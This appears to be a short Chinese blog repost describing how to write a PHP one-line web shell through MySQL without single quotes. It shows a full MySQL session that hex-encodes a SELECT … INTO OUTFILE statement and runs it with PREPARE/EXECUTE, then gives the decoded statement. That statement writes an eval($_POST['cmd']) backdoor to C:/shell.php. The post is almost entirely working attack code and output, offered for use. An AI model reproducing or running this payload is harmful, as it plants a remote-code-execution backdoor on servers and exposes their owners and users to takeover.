• 单引号转义时load_file/outfile 生成一句话

    mysql多语句执行下不用单引号outfile写shell
     
    mysql> use xssdb;
    Database changed
     
    mysql> set @a=0x73656C6563742030783343334637303638373032303430363537363631364332
    38323435463530344635333534354232373633364436343237354432393342334633452066726F6D
    20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70687027;
    Query OK, 0 rows affected (0.00 sec)
    mysql> prepare cmd from @a;
    Query OK, 0 rows affected (0.00 sec)
    Statement prepared
    mysql> execute cmd;
    Query OK, 1 row affected (0.00 sec)
     
     
    上面加密的十六进制是:
    select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from xss limit 1 into outfile 'C:/shell.php'
  • 相关阅读:
    Poj2033
    CodeForces 540
    CodeForces 548
    LeetCode#2 Add Two Numbers
    CodeForces 544A
    POJ 2431Expedition
    HLG1116-选美大赛
    清华学堂 列车调度(Train)
    清华学堂 LightHouse
    清华学堂 Range
  • 原文地址:https://www.cnblogs.com/94YY/p/2047732.html
Copyright © 2020-2023  润新知